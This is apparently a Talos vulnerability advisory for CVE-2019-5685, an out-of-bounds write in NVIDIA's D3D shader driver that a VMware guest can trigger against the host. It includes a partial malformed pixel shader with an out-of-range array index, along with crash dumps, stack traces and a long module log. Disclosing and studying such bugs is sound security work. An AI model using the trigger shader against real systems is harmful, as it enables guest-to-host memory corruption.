Talos Vulnerability Report

TALOS-2019-0812

NVIDIA NVWGF2UMX_CFG.DLL Shader functionality DCL_INDEXABLETEMP code execution vulnerability

August 5, 2019

CVE Number

CVE-2019-5685

Summary

An exploitable memory corruption vulnerability exists in NVIDIA NVWGF2UMX_CFG driver, versions 25.21.14.2531 and 425.31. A specially crafted pixel shader can cause an out-of-bounds memory write. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from VMware guest, affecting VMware host.

Tested Versions

NVWGF2UMX_CFG.DLL (version 25.21.14.2531) NVIDIA D3D10 Driver, Version 425.31 on NVIDIA Quadro K620 VMware Workstation 15 (15.0.4 build-12990004) with Windows 10 x64 as guestVM

Product URLs

http://nvidia.com http://vmware.com

CVSSv3 Score

9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-787: Out-of-bounds Write

Details

This vulnerability can be triggered by supplying a malformed pixel shader (inside VMware guest OS) to the NVIDIA NVWGF2UMX_CFG.DLL driver. Such an attack can be triggered from a VMware guest usermode to cause a memory corruption on vmware-vmx.exe process on the host, or theoretically through WEBGL (remote website).

Example of malformed pixel shader:

ps_4_0
dcl_constantbuffer cb0[2], immediateIndexed
dcl_indexableTemp x1[3], 4
dcl_indexableTemp x2[3], 4
dcl_indexableTemp x3[3], 4
dcl_indexableTemp x4[3], 4
dcl_indexableTemp x5[3], 4
dcl_indexableTemp x6[3], 4
...
mov x1[1].y, l(0.900447,0.900447,0.900447,0.900447)
mov x1[1].z, l(-0.434966,-0.434966,-0.434966,-0.434966)
mov x1[2].x, l(0,0,0,0)
mov x1[2].y, l(0.434966,0.434966,0.434966,0.434966)
mov x1[2].z, l(0.900447,0.900447,0.900447,0.900447)
mov x2[52278].xyzw, x1[0].xyzz
mov x2[1].xyzw, x1[1].xyzz
mov x2[2].xyzw, x1[2].xyzz
mov x3[0].x, l(0.900447,0.900447,0.900447,0.900447)
...

The DCL_INDEXABLETEMP function declares an indexable, temporary, register (in this case 3 is the number of elements in the register array (x2), and 4 is the number of components in the register array).
By modifying the shader bytecode of the MOV X2[X] instruction (particularly, changing the index of the array to be larger than previously defined) it is possible to trigger out-of-bounds memory write in NVIDIA’s NVWGF2UMX_CFG.DLL driver. This bug is due to incorrect destination memory address calculation (R9 register, see below), the calculation is done in the NVWGF2UMX_CFG.DLL driver.

(vmware release mode crash dump fragment):

0:015> .ecxr
rax=0000000000000000 rbx=0000025a57f0c2e0 rcx=0000000000000000
rdx=0000000000000001 rsi=0000000000000001 rdi=0000000000000000
rip=00007ffdca904540 rsp=000000c723cfb630 rbp=000000c723cfb730
 r8=0000000000000000  r9=0000029a5832e6b0 r10=000000000000000f
r11=00000000000000a4 r12=0000000000040300 r13=0000000000000001
r14=0000025a580f12a0 r15=0000025a583bd870
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
nvwgf2umx_cfg!OpenAdapter12+0x17aea0:
00007ffd`ca904540 410f1101        movups  xmmword ptr [r9],xmm0 ds:0000029a`5832e6b0=????????????????????????????????

stack trace:

0:015> kb
  *** Stack trace for last set context - .thread/.cxr resets it
 # RetAddr           : Args to Child                                                           : Call Site
00 00007ffd`ca79dfb1 : 0000025a`580f12a0 00007ffd`cb315bc0 0000025a`580f12a0 0000025a`5772f0c0 : nvwgf2umx_cfg!OpenAdapter12+0x17aea0
01 00007ffd`ca79e7a8 : 00007ffd`ca7870b0 0000025a`57e076c0 00007ffd`ca7870b0 0000025a`57b12140 : nvwgf2umx_cfg!OpenAdapter12+0x14911
02 00007ffd`ca79f906 : 0000025a`57fe83c8 000000c7`23cfb9d9 00000000`fd0000fd 00007ffd`d936d997 : nvwgf2umx_cfg!OpenAdapter12+0x15108
03 00007ffd`ca99a9d9 : 0000025a`57fe83c8 0000025a`5773d480 000000c7`23cfbce0 00000000`00000110 : nvwgf2umx_cfg!OpenAdapter12+0x16266
04 00007ffd`cb4c0d61 : 0000025a`00000000 00000000`00000cf0 0000025a`57fe83c8 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x211339
05 00007ffd`cb4baaa7 : 0000025a`57fe83c8 00000000`00000000 0000025a`5770c6a0 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x347461
06 00007ffd`d279b11d : 00000000`00000000 000000c7`23cfc4c0 0000025a`57fe83b8 0000025a`577000b0 : nvwgf2umx_cfg!NVAPI_Thunk+0x3411a7
07 00007ffd`d2794eab : 0000025a`5842cfdc 0000025a`577000b0 0000025a`57fe83b8 00000000`00000000 : d3d11!CPixelShader::CLS::FinalConstruct+0x219
08 00007ffd`d2794dc3 : 000000c7`23cfe030 00007ffd`d2973b10 0000025a`57fe8250 00000000`00000000 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
09 00007ffd`d27a7665 : 0000025a`57fe82b0 000000c7`23cfe030 000000c7`23cfe060 00007ffd`d2973b10 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x14b
0a 00007ffd`d27acac6 : 00000000`00000000 00000000`00000030 00000000`00000000 00000000`00000030 : d3d11!CDevice::CreateLayeredChild+0x975
0b 00007ffd`d27ad3c0 : 0000025a`57fe8250 00000258`d12418c8 00007ffd`d29730e8 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x266
0c 00007ffd`d278ca83 : 00000258`d10016b0 00000258`00000009 00000258`d1001ee8 00007ffd`d278aa43 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
0d 00007ffd`d278a976 : 0000025a`5842cf40 00000000`0000b000 000000c7`23cfe459 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x5f
0e 00007ffd`d278a768 : 00000258`d1001ee8 0000025a`5842cf40 00000000`00000d4c 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x202
0f 00007ff7`33968802 : 0000025a`5812c050 00007ff7`336b0000 00007ff7`336b0000 00000258`d05f0600 : d3d11!CDevice::CreatePixelShader+0x28
10 00007ff7`3396a0e5 : 0000025a`5812c050 00007ff7`336b0000 00007ff7`336b0000 00000258`d1001708 : vmware_vmx+0x2b8802
11 00007ff7`33968f62 : 0000025a`58133fd0 00007ff7`336b0000 0000025a`5812c050 0000025a`5812c050 : vmware_vmx+0x2ba0e5
12 00007ff7`33965451 : 00000000`fffe4000 0000025a`5812c050 00000000`00000003 0000025a`584c3f70 : vmware_vmx+0x2b8f62
13 00007ff7`338beec9 : 00007ff7`338bee00 0000025a`584c3f60 00000000`00000028 00007ff7`339a3e50 : vmware_vmx+0x2b5451
14 00007ff7`338529d2 : 00000000`00000040 00007ff7`338bee00 000000c7`23cff700 00000000`00000028 : vmware_vmx+0x20eec9
15 00007ff7`33850a9f : 000000c7`23cff820 00000000`00000040 00000000`00000000 00000000`00000001 : vmware_vmx+0x1a29d2
16 00007ff7`337a65a0 : 00000258`d05f0600 00000258`d05f06e0 00000000`00000001 00000000`00000000 : vmware_vmx+0x1a0a9f
17 00007ff7`33ccc7b0 : 00007ff7`337a6480 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0xf65a0
18 00007ffd`d6bc7974 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x61c7b0
19 00007ffd`d93ca271 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
1a 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21

Crash Information

From vmware-vmx.exe (this is not a windbg crash dump):

2019-04-17T09:09:23.660+02:00| svga| W115: ----Win32 exception detected, exceptionCode 0xc0000005 (access violation)----
2019-04-17T09:09:23.660+02:00| svga| W115: ExceptionAddress 0x7ffdca904540 eflags 0x00010246
2019-04-17T09:09:23.660+02:00| svga| W115: rwFlags 0x1 badAddr 0x29a5832e6b0
2019-04-17T09:09:23.660+02:00| svga| W115: rax 0 rbx 0x25a57f0c2e0 rcx 0
2019-04-17T09:09:23.660+02:00| svga| W115: rdx 0 rsi 0x1 rdi 0
2019-04-17T09:09:23.660+02:00| svga| W115: r8 0 r9 0x29a5832e6b0 r10 0xf
2019-04-17T09:09:23.660+02:00| svga| W115: r11 0xa4 r12 0x40300 r13 0x1
2019-04-17T09:09:23.660+02:00| svga| W115: r14 0x25a580f12a0 r15 0x25a583bd870
2019-04-17T09:09:23.660+02:00| svga| W115: rip 0x7ffdca904540 rsp 0xc723cfb630 rbp 0xc723cfb730
2019-04-17T09:09:23.660+02:00| svga| W115: LastBranchToRip 0 LastBranchFromRip 0
2019-04-17T09:09:23.660+02:00| svga| W115: LastExceptionToRip 0 LastExceptionFromRip 0
2019-04-17T09:09:23.661+02:00| svga| W115: The following data was delivered with the exception:
2019-04-17T09:09:23.661+02:00| svga| W115:  -- 0x1
2019-04-17T09:09:23.661+02:00| svga| W115:  -- 0x29a5832e6b0
2019-04-17T09:09:23.661+02:00| svga| I125: CoreDump: Minidump file K:\vmware_images\windows_10_x64_uefi\vmware-vmx.dmp exists. Rotating ...
2019-04-17T09:09:23.665+02:00| svga| W115: CoreDump: Writing minidump to K:\vmware_images\windows_10_x64_uefi\vmware-vmx.dmp
2019-04-17T09:09:23.819+02:00| svga| I125: CoreDump: including module base 0x0x7ff7336b0000 size 0x0x0124d000
2019-04-17T09:09:23.819+02:00| svga| I125:   checksum 0x00f675c1 timestamp 0x5c9991d2
2019-04-17T09:09:23.819+02:00| svga| I125:   image file K:\tools\vmware\x64\vmware-vmx.exe
2019-04-17T09:09:23.819+02:00| svga| I125:   file version 15.0.4.45173
2019-04-17T09:09:23.819+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd9360000 size 0x0x001ed000
2019-04-17T09:09:23.819+02:00| svga| I125:   checksum 0x001ebfe1 timestamp 0xbf6ea104
2019-04-17T09:09:23.819+02:00| svga| I125:   image file C:\Windows\System32\ntdll.dll
2019-04-17T09:09:23.819+02:00| svga| I125:   file version 10.0.17763.404
2019-04-17T09:09:23.819+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6bb0000 size 0x0x000b3000
2019-04-17T09:09:23.819+02:00| svga| I125:   checksum 0x000b8bb9 timestamp 0xa9e3d878
2019-04-17T09:09:23.819+02:00| svga| I125:   image file C:\Windows\System32\kernel32.dll
2019-04-17T09:09:23.819+02:00| svga| I125:   file version 10.0.17763.437
2019-04-17T09:09:23.819+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd62f0000 size 0x0x00293000
2019-04-17T09:09:23.819+02:00| svga| I125:   checksum 0x002955e7 timestamp 0x2528b630
2019-04-17T09:09:23.819+02:00| svga| I125:   image file C:\Windows\System32\KERNELBASE.dll
2019-04-17T09:09:23.819+02:00| svga| I125:   file version 10.0.17763.404
2019-04-17T09:09:23.819+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd56c0000 size 0x0x000fa000
2019-04-17T09:09:23.819+02:00| svga| I125:   checksum 0x0010666d timestamp 0x490b0aeb
2019-04-17T09:09:23.819+02:00| svga| I125:   image file C:\Windows\System32\ucrtbase.dll
2019-04-17T09:09:23.819+02:00| svga| I125:   file version 10.0.17763.404
2019-04-17T09:09:23.819+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd71c0000 size 0x0x00197000
2019-04-17T09:09:23.819+02:00| svga| I125:   checksum 0x0019e334 timestamp 0x5960d576
2019-04-17T09:09:23.819+02:00| svga| I125:   image file C:\Windows\System32\user32.dll
2019-04-17T09:09:23.819+02:00| svga| I125:   file version 10.0.17763.168
2019-04-17T09:09:23.819+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5a80000 size 0x0x00020000
2019-04-17T09:09:23.819+02:00| svga| I125:   checksum 0x000230fc timestamp 0xff141dbb
2019-04-17T09:09:23.819+02:00| svga| I125:   image file C:\Windows\System32\win32u.dll
2019-04-17T09:09:23.819+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.819+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd7190000 size 0x0x00029000
2019-04-17T09:09:23.819+02:00| svga| I125:   checksum 0x000274e8 timestamp 0xaa866dfc
2019-04-17T09:09:23.819+02:00| svga| I125:   image file C:\Windows\System32\gdi32.dll
2019-04-17T09:09:23.819+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.820+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc4d90000 size 0x0x00015000
2019-04-17T09:09:23.820+02:00| svga| I125:   checksum 0x00017b21 timestamp 0x5be33079
2019-04-17T09:09:23.820+02:00| svga| I125:   image file C:\Windows\System32\VCRUNTIME140.dll
2019-04-17T09:09:23.820+02:00| svga| I125:   file version 14.16.27024.1
2019-04-17T09:09:23.820+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd57c0000 size 0x0x0019a000
2019-04-17T09:09:23.820+02:00| svga| I125:   checksum 0x001a616f timestamp 0xb135bc52
2019-04-17T09:09:23.820+02:00| svga| I125:   image file C:\Windows\System32\gdi32full.dll
2019-04-17T09:09:23.820+02:00| svga| I125:   file version 10.0.17763.437
2019-04-17T09:09:23.820+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5aa0000 size 0x0x000a0000
2019-04-17T09:09:23.820+02:00| svga| I125:   checksum 0x000a22bb timestamp 0x448f33c2
2019-04-17T09:09:23.820+02:00| svga| I125:   image file C:\Windows\System32\msvcp_win.dll
2019-04-17T09:09:23.820+02:00| svga| I125:   file version 10.0.17763.348
2019-04-17T09:09:23.820+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6ee0000 size 0x0x00155000
2019-04-17T09:09:23.820+02:00| svga| I125:   checksum 0x00155939 timestamp 0x5593b9c6
2019-04-17T09:09:23.820+02:00| svga| I125:   image file C:\Windows\System32\ole32.dll
2019-04-17T09:09:23.820+02:00| svga| I125:   file version 10.0.17763.404
2019-04-17T09:09:23.820+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd8ba0000 size 0x0x0032c000
2019-04-17T09:09:23.820+02:00| svga| I125:   checksum 0x0032e257 timestamp 0x1c3dc270
2019-04-17T09:09:23.820+02:00| svga| I125:   image file C:\Windows\System32\combase.dll
2019-04-17T09:09:23.820+02:00| svga| I125:   file version 10.0.17763.404
2019-04-17T09:09:23.820+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd7360000 size 0x0x00122000
2019-04-17T09:09:23.820+02:00| svga| I125:   checksum 0x00124564 timestamp 0x28d25d35
2019-04-17T09:09:23.820+02:00| svga| I125:   image file C:\Windows\System32\rpcrt4.dll
2019-04-17T09:09:23.820+02:00| svga| I125:   file version 10.0.17763.379
2019-04-17T09:09:23.820+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5980000 size 0x0x0007e000
2019-04-17T09:09:23.820+02:00| svga| I125:   checksum 0x000897e0 timestamp 0xe29631ca
2019-04-17T09:09:23.820+02:00| svga| I125:   image file C:\Windows\System32\bcryptPrimitives.dll
2019-04-17T09:09:23.820+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.820+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6b00000 size 0x0x000a3000
2019-04-17T09:09:23.820+02:00| svga| I125:   checksum 0x000a4051 timestamp 0xb12069f9
2019-04-17T09:09:23.820+02:00| svga| I125:   image file C:\Windows\System32\advapi32.dll
2019-04-17T09:09:23.820+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.820+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6c70000 size 0x0x0009e000
2019-04-17T09:09:23.820+02:00| svga| I125:   checksum 0x000a6576 timestamp 0x05c26c69
2019-04-17T09:09:23.820+02:00| svga| I125:   image file C:\Windows\System32\msvcrt.dll
2019-04-17T09:09:23.820+02:00| svga| I125:   file version 7.0.17763.1
2019-04-17T09:09:23.820+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd9290000 size 0x0x0009e000
2019-04-17T09:09:23.820+02:00| svga| I125:   checksum 0x000a9176 timestamp 0x7d59184a
2019-04-17T09:09:23.820+02:00| svga| I125:   image file C:\Windows\System32\sechost.dll
2019-04-17T09:09:23.820+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.820+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd7500000 size 0x0x014f0000
2019-04-17T09:09:23.820+02:00| svga| I125:   checksum 0x01517832 timestamp 0x6a056922
2019-04-17T09:09:23.820+02:00| svga| I125:   image file C:\Windows\System32\shell32.dll
2019-04-17T09:09:23.820+02:00| svga| I125:   file version 10.0.17763.348
2019-04-17T09:09:23.820+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5a30000 size 0x0x0004a000
2019-04-17T09:09:23.820+02:00| svga| I125:   checksum 0x0004f3eb timestamp 0xca7e64ca
2019-04-17T09:09:23.820+02:00| svga| I125:   image file C:\Windows\System32\cfgmgr32.dll
2019-04-17T09:09:23.820+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.820+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd70c0000 size 0x0x000a8000
2019-04-17T09:09:23.820+02:00| svga| I125:   checksum 0x000a6bc1 timestamp 0x9a0e77eb
2019-04-17T09:09:23.820+02:00| svga| I125:   image file C:\Windows\System32\SHCore.dll
2019-04-17T09:09:23.820+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.820+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5b40000 size 0x0x0074a000
2019-04-17T09:09:23.820+02:00| svga| I125:   checksum 0x0075e103 timestamp 0x1402bc75
2019-04-17T09:09:23.820+02:00| svga| I125:   image file C:\Windows\System32\windows.storage.dll
2019-04-17T09:09:23.820+02:00| svga| I125:   file version 10.0.17763.404
2019-04-17T09:09:23.820+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5400000 size 0x0x00024000
2019-04-17T09:09:23.821+02:00| svga| I125:   checksum 0x0002ec08 timestamp 0x36191177
2019-04-17T09:09:23.821+02:00| svga| I125:   image file C:\Windows\System32\profapi.dll
2019-04-17T09:09:23.821+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.821+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd53a0000 size 0x0x0005d000
2019-04-17T09:09:23.821+02:00| svga| I125:   checksum 0x0006167d timestamp 0x8941f3e3
2019-04-17T09:09:23.821+02:00| svga| I125:   image file C:\Windows\System32\powrprof.dll
2019-04-17T09:09:23.821+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.821+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd7490000 size 0x0x00052000
2019-04-17T09:09:23.821+02:00| svga| I125:   checksum 0x0005be0c timestamp 0x4392c932
2019-04-17T09:09:23.821+02:00| svga| I125:   image file C:\Windows\System32\shlwapi.dll
2019-04-17T09:09:23.821+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.821+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5360000 size 0x0x00011000
2019-04-17T09:09:23.821+02:00| svga| I125:   checksum 0x0001c039 timestamp 0xbe88784d
2019-04-17T09:09:23.821+02:00| svga| I125:   image file C:\Windows\System32\kernel.appcore.dll
2019-04-17T09:09:23.821+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.821+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5960000 size 0x0x00017000
2019-04-17T09:09:23.821+02:00| svga| I125:   checksum 0x0001f088 timestamp 0xfe800ac7
2019-04-17T09:09:23.821+02:00| svga| I125:   image file C:\Windows\System32\cryptsp.dll
2019-04-17T09:09:23.821+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.821+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6590000 size 0x0x00476000
2019-04-17T09:09:23.821+02:00| svga| I125:   checksum 0x00488689 timestamp 0xcc9bc0eb
2019-04-17T09:09:23.821+02:00| svga| I125:   image file C:\Windows\System32\setupapi.dll
2019-04-17T09:09:23.821+02:00| svga| I125:   file version 10.0.17763.404
2019-04-17T09:09:23.821+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5a00000 size 0x0x00026000
2019-04-17T09:09:23.821+02:00| svga| I125:   checksum 0x0002f670 timestamp 0x4d019572
2019-04-17T09:09:23.821+02:00| svga| I125:   image file C:\Windows\System32\bcrypt.dll
2019-04-17T09:09:23.821+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.821+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd7050000 size 0x0x0006d000
2019-04-17T09:09:23.821+02:00| svga| I125:   checksum 0x0006d338 timestamp 0x4ee4fbbf
2019-04-17T09:09:23.821+02:00| svga| I125:   image file C:\Windows\System32\ws2_32.dll
2019-04-17T09:09:23.821+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.821+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd8ad0000 size 0x0x000c4000
2019-04-17T09:09:23.821+02:00| svga| I125:   checksum 0x000d15cf timestamp 0xbcde805b
2019-04-17T09:09:23.821+02:00| svga| I125:   image file C:\Windows\System32\oleaut32.dll
2019-04-17T09:09:23.821+02:00| svga| I125:   file version 10.0.17763.437
2019-04-17T09:09:23.821+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5430000 size 0x0x001db000
2019-04-17T09:09:23.821+02:00| svga| I125:   checksum 0x001de80e timestamp 0xb2fbbe58
2019-04-17T09:09:23.821+02:00| svga| I125:   image file C:\Windows\System32\crypt32.dll
2019-04-17T09:09:23.821+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.821+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5380000 size 0x0x00012000
2019-04-17T09:09:23.821+02:00| svga| I125:   checksum 0x0001b8e7 timestamp 0xac91a4b2
2019-04-17T09:09:23.821+02:00| svga| I125:   image file C:\Windows\System32\msasn1.dll
2019-04-17T09:09:23.821+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.821+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd3640000 size 0x0x00024000
2019-04-17T09:09:23.821+02:00| svga| I125:   checksum 0x00029b8b timestamp 0x01dd0441
2019-04-17T09:09:23.821+02:00| svga| I125:   image file C:\Windows\System32\winmm.dll
2019-04-17T09:09:23.821+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.821+02:00| svga| I125: CoreDump: including module base 0x0x7ffdb1eb0000 size 0x0x00096000
2019-04-17T09:09:23.821+02:00| svga| I125:   checksum 0x00097a6b timestamp 0x807cb1be
2019-04-17T09:09:23.821+02:00| svga| I125:   image file C:\Windows\System32\dsound.dll
2019-04-17T09:09:23.821+02:00| svga| I125:   file version 10.0.17763.348
2019-04-17T09:09:23.821+02:00| svga| I125: CoreDump: including module base 0x0x64190000 size 0x0x0001a000
2019-04-17T09:09:23.821+02:00| svga| I125:   checksum 0x00025128 timestamp 0x5b281fdf
2019-04-17T09:09:23.821+02:00| svga| I125:   image file K:\tools\vmware\x64\zlib1.dll
2019-04-17T09:09:23.821+02:00| svga| I125:   file version 1.2.11.0
2019-04-17T09:09:23.821+02:00| svga| I125: CoreDump: including module base 0x0x7ffdcddc0000 size 0x0x00041000
2019-04-17T09:09:23.821+02:00| svga| I125:   checksum 0x00040f64 timestamp 0xc2c19daa
2019-04-17T09:09:23.822+02:00| svga| I125:   image file C:\Windows\System32\WinSCard.dll
2019-04-17T09:09:23.822+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.822+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd1050000 size 0x0x000f1000
2019-04-17T09:09:23.822+02:00| svga| I125:   checksum 0x000fe09f timestamp 0x94933b3b
2019-04-17T09:09:23.822+02:00| svga| I125:   image file C:\Windows\System32\winhttp.dll
2019-04-17T09:09:23.822+02:00| svga| I125:   file version 10.0.17763.404
2019-04-17T09:09:23.822+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd1da0000 size 0x0x00013000
2019-04-17T09:09:23.822+02:00| svga| I125:   checksum 0x000141f8 timestamp 0x645d63a8
2019-04-17T09:09:23.822+02:00| svga| I125:   image file C:\Windows\System32\wtsapi32.dll
2019-04-17T09:09:23.822+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.822+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd3610000 size 0x0x0002d000
2019-04-17T09:09:23.822+02:00| svga| I125:   checksum 0x000313bc timestamp 0x61c36296
2019-04-17T09:09:23.822+02:00| svga| I125:   image file C:\Windows\System32\WINMMBASE.dll
2019-04-17T09:09:23.822+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.822+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5170000 size 0x0x00029000
2019-04-17T09:09:23.822+02:00| svga| I125:   checksum 0x00035933 timestamp 0x38fddd55
2019-04-17T09:09:23.822+02:00| svga| I125:   image file C:\Windows\System32\devobj.dll
2019-04-17T09:09:23.822+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.822+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6ad0000 size 0x0x0002e000
2019-04-17T09:09:23.822+02:00| svga| I125:   checksum 0x000306da timestamp 0x6b207046
2019-04-17T09:09:23.822+02:00| svga| I125:   image file C:\Windows\System32\imm32.dll
2019-04-17T09:09:23.822+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.822+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd39a0000 size 0x0x0009c000
2019-04-17T09:09:23.822+02:00| svga| I125:   checksum 0x00098b0d timestamp 0x4b037c22
2019-04-17T09:09:23.822+02:00| svga| I125:   image file C:\Windows\System32\uxtheme.dll
2019-04-17T09:09:23.822+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.822+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd44a0000 size 0x0x00031000
2019-04-17T09:09:23.822+02:00| svga| I125:   checksum 0x000360d6 timestamp 0x376a9861
2019-04-17T09:09:23.822+02:00| svga| I125:   image file C:\Windows\System32\ntmarta.dll
2019-04-17T09:09:23.822+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.822+02:00| svga| I125: CoreDump: including module base 0x0x63f40000 size 0x0x0024b000
2019-04-17T09:09:23.822+02:00| svga| I125:   checksum 0x00250d79 timestamp 0x5c0d2810
2019-04-17T09:09:23.822+02:00| svga| I125:   image file K:\tools\vmware\x64\libeay32.dll
2019-04-17T09:09:23.822+02:00| svga| I125:   file version 1.0.2.17
2019-04-17T09:09:23.822+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc6410000 size 0x0x0005d000
2019-04-17T09:09:23.822+02:00| svga| I125:   checksum 0x0006be35 timestamp 0x5c0d281f
2019-04-17T09:09:23.822+02:00| svga| I125:   image file K:\tools\vmware\x64\ssleay32.dll
2019-04-17T09:09:23.822+02:00| svga| I125:   file version 1.0.2.17
2019-04-17T09:09:23.822+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd4740000 size 0x0x00033000
2019-04-17T09:09:23.822+02:00| svga| I125:   checksum 0x00039b84 timestamp 0xeb037b86
2019-04-17T09:09:23.822+02:00| svga| I125:   image file C:\Windows\System32\rsaenh.dll
2019-04-17T09:09:23.822+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.822+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd4db0000 size 0x0x0000c000
2019-04-17T09:09:23.822+02:00| svga| I125:   checksum 0x0000d582 timestamp 0x210d2d73
2019-04-17T09:09:23.822+02:00| svga| I125:   image file C:\Windows\System32\CRYPTBASE.dll
2019-04-17T09:09:23.822+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.822+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5260000 size 0x0x0002f000
2019-04-17T09:09:23.822+02:00| svga| I125:   checksum 0x000339df timestamp 0xebd3b7f6
2019-04-17T09:09:23.822+02:00| svga| I125:   image file C:\Windows\System32\sspicli.dll
2019-04-17T09:09:23.822+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.822+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd4be0000 size 0x0x00067000
2019-04-17T09:09:23.822+02:00| svga| I125:   checksum 0x0006982f timestamp 0x9cffe601
2019-04-17T09:09:23.822+02:00| svga| I125:   image file C:\Windows\System32\mswsock.dll
2019-04-17T09:09:23.822+02:00| svga| I125:   file version 10.0.17763.292
2019-04-17T09:09:23.822+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd4920000 size 0x0x000c6000
2019-04-17T09:09:23.822+02:00| svga| I125:   checksum 0x000d24fb timestamp 0x33466d5f
2019-04-17T09:09:23.822+02:00| svga| I125:   image file C:\Windows\System32\dnsapi.dll
2019-04-17T09:09:23.823+02:00| svga| I125:   file version 10.0.17763.404
2019-04-17T09:09:23.823+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6a10000 size 0x0x00008000
2019-04-17T09:09:23.823+02:00| svga| I125:   checksum 0x0000c1ee timestamp 0x7ace72dc
2019-04-17T09:09:23.823+02:00| svga| I125:   image file C:\Windows\System32\nsi.dll
2019-04-17T09:09:23.823+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.823+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd48e0000 size 0x0x0003d000
2019-04-17T09:09:23.823+02:00| svga| I125:   checksum 0x0003b254 timestamp 0x55458551
2019-04-17T09:09:23.823+02:00| svga| I125:   image file C:\Windows\System32\IPHLPAPI.DLL
